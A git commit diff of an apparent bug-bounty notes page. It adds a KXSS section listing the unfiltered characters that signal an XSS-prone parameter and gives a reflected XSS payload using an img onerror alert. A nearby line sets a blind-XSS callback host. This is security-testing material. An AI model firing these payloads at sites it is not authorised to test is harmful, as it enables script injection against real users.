GITBOOK-55: change request with no subject merged in GitBook

This commit is contained in:
Xalgord 2023-07-26 17:44:13 +00:00 committed by gitbook-bot
parent aedb40ca27
commit 108a5d42cc
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF

View file

@ -65,6 +65,16 @@ cat urls.txt --> read the file
-b xalgord.xss.ht --> BXSS payload adder.
```
### KXSS
The vulnerable parameter for XSS should have Unfiltered : **\[“ < > $ | ( ) \` : ; { } ]**
**Payload:**&#x20;
```
"><img%20src=x%20onerror="alert(%27POC%20By%20Xalgord%27)"
```
### Open Redirect Mass Hunt
* tool = ragno, qsreplace